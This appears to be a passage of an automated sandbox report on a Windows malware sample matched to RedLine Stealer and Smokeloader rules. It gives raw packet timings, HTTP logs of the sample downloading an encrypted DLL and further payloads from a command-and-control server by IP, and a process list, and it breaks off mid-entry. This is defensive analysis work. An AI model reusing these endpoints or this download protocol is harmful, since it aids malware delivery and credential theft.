                                                            Oct 8, 2024 10:08:44.741432905 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.741449118 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.741461039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.741461039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.741481066 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.828099966 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828125954 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828135967 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828197002 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828207970 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828218937 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828224897 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828350067 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828360081 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828376055 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.828377008 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.828393936 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828404903 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828414917 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828424931 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828433037 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.828433037 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.829004049 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.874838114 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.874866009 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.874876022 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.874881029 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.874891043 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.874901056 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.874912024 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.874999046 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.875056028 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.875058889 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.875066996 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.875077963 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.875087023 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.875097036 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.875106096 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.875116110 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.875118971 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.875125885 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.875135899 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.875144958 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.875145912 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.875175953 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.875205994 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.919286013 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.919454098 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.964693069 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.964732885 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.964749098 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.964812040 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.964834929 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.964852095 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.964853048 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.964868069 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.964884043 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.964895010 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.964900017 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.964915991 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.964962959 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.964989901 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.965006113 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.965019941 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.965034962 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.965044975 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.965051889 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.965065002 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.965085983 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.965127945 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.013717890 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.013732910 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.013756037 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.013771057 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.013784885 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.013799906 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.013814926 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.013842106 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.013880968 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.013885021 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.013936043 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.013969898 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.013984919 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.013999939 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.014014959 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.014025927 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.014046907 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.014092922 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.014857054 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.014895916 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.014909983 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.014925003 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.014939070 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.014954090 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.015110016 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.015110970 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.015110970 CEST4973080192.168.2.480.66.75.114
                                                            • 80.66.75.114
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 80.66.75.114 | 80 | 3152 | C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 10:08:09.341484070 CEST | 384 | OUT | GET /name HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: 1
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
Oct 8, 2024 10:08:10.086735010 CEST | 210 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:09 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 7
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 6d 69 78 6e 69 6e 65
                                                            Data Ascii: mixnine
Oct 8, 2024 10:08:10.121747017 CEST | 416 | OUT | GET /add?substr=mixnine&s=three&sub=NOSUB HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: 1
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
Oct 8, 2024 10:08:10.378456116 CEST | 203 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:10 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=99
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 30
                                                            Data Ascii: 0
Oct 8, 2024 10:08:10.383874893 CEST | 387 | OUT | GET /dll/key HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: 1
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
Oct 8, 2024 10:08:10.622387886 CEST | 224 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:10 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 21
                                                            Keep-Alive: timeout=5, max=98
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                                            Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
Oct 8, 2024 10:08:10.630323887 CEST | 392 | OUT | GET /dll/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: 1
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
Oct 8, 2024 10:08:10.876530886 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:10 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                            Content-Length: 97296
                                                            Keep-Alive: timeout=5, max=97
                                                            Connection: Keep-Alive
                                                            Content-Type: application/octet-stream
                                                            Oct 8, 2024 10:08:11.445183039 CEST 394 OUT GET /files/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:11.692985058 CEST 203 IN HTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:11 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=96
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 30
                                                            Data Ascii: 0
                                                            Oct 8, 2024 10:08:13.740324020 CEST 394 OUT GET /files/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:13.987679958 CEST 203 IN HTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:13 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=95
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 30
                                                            Data Ascii: 0
                                                            Oct 8, 2024 10:08:16.021287918 CEST 394 OUT GET /files/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:16.262528896 CEST 203 IN HTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:16 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=94
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 30
                                                            Data Ascii: 0
                                                            Oct 8, 2024 10:08:18.302316904 CEST 394 OUT GET /files/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:18.550729036 CEST 203 IN HTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:18 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=93
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 30
                                                            Data Ascii: 0
                                                            Oct 8, 2024 10:08:20.583638906 CEST 394 OUT GET /files/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:20.835737944 CEST 203 IN HTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:20 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=92
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 30
                                                            Data Ascii: 0
                                                            Oct 8, 2024 10:08:22.864959002 CEST 394 OUT GET /files/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:23.123287916 CEST 203 IN HTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:22 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=91
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 30
                                                            Data Ascii: 0
                                                            Oct 8, 2024 10:08:25.146970034 CEST 394 OUT GET /files/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:25.395947933 CEST 203 IN HTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:25 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=90
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 30
                                                            Data Ascii: 0
                                                            Oct 8, 2024 10:08:27.427881002 CEST 394 OUT GET /files/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:27.661278009 CEST 203 IN HTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:27 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=89
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 30
                                                            Data Ascii: 0
                                                            Oct 8, 2024 10:08:29.693419933 CEST 394 OUT GET /files/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:29.976442099 CEST 203 IN HTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:29 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=88
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 30
                                                            Data Ascii: 0
                                                            Oct 8, 2024 10:08:32.015285969 CEST 394 OUT GET /files/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:32.253798962 CEST 203 IN HTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:32 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=87
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 30
                                                            Data Ascii: 0
                                                            Oct 8, 2024 10:08:34.271671057 CEST 394 OUT GET /files/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:34.964449883 CEST 203 IN HTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:34 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=86
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 30
                                                            Data Ascii: 0
                                                            Oct 8, 2024 10:08:38.037252903 CEST 393 OUT GET /soft/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: d
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:38.298378944 CEST 1236 IN HTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:38 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Disposition: attachment; filename="dll";
                                                            Content-Length: 242176
                                                            Keep-Alive: timeout=5, max=85
                                                            Connection: Keep-Alive
                                                            Content-Type: application/octet-stream
                                                            Oct 8, 2024 10:08:39.387662888 CEST 393 OUT GET /soft/download HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: s
                                                            Host: 80.66.75.114
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Oct 8, 2024 10:08:39.751545906 CEST 1236 IN HTTP/1.1 200 OK
                                                            Date: Tue, 08 Oct 2024 08:08:39 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Disposition: attachment; filename="soft";
                                                            Content-Length: 1502720
                                                            Keep-Alive: timeout=5, max=84
                                                            Connection: Keep-Alive
                                                            Content-Type: application/octet-stream



                                                            Target ID:0
                                                            Start time:04:07:58
                                                            Start date:08/10/2024
                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe"
                                                            Imagebase:0x400000
                                                            File size:307'200 bytes
                                                            MD5 hash:B1281430B4F8C39015940B1E5DC9D569
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2953574713.00000000007AA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:04:08:03
                                                            Start date:08/10/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 740
                                                            Imagebase:0x590000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:04:08:04
                                                            Start date:08/10/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 748
                                                            Imagebase:0x590000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:04:08:05
                                                            Start date:08/10/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 776
                                                            Imagebase:0x590000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:04:08:05
                                                            Start date:08/10/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 788
                                                            Imagebase:0x590000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:04:08:06
                                                            Start date:08/10/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 924
                                                            Imagebase:0x590000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:13
                                                            Start time:04:08:07
                                                            Start date:08/10/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 1016
                                                            Imagebase:0x590000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:18
                                                            Start time:04:08:44
                                                            Start date:08/10/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
